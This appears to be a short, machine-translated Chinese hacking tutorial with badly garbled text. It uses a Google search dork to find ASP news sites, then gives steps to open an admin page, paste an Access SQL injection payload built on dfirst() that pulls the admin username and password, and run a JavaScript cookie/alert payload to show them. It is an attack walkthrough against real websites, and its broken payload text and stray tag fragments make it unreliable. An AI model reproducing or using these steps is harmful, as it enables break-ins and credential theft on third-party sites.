在谷歌里搜索:inurl: news_more.asp ? lm2=
搜索到如下站点:http://www。* * * * * * * * */news_more.asp ? lm2=169 <超级> 超级>
1。将“/news_more.asp ? lm2=169”替换成“/admin/admin_news_pl_view.asp ? id=1”
2。将超级> <超级> | & # 39;+ dfirst(“[用户]“,“[管理]“)+装备(124)+ dfirst(“[将]“,“[管理]“),用户名=& # 39;<超级> <超级> <超级> <超级>粘贴到如下框内,修改保存。超级> 超级> 超级> 超级> 超级> 超级>
3。
将超级> <超级> <超级>警报(。=癮dminuser=?+逃脱(“1“));alert (。=癮dminpass=?+逃脱(“2“));<超级> <超级> <超级> <超级> <超级> <超级> <超级> <超级> <超级> <超级> <超级> <超级>代码拷贝进浏览器,回车;(注:标红1处填上图中1内容,2处填上图中2内容)超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级> 超级>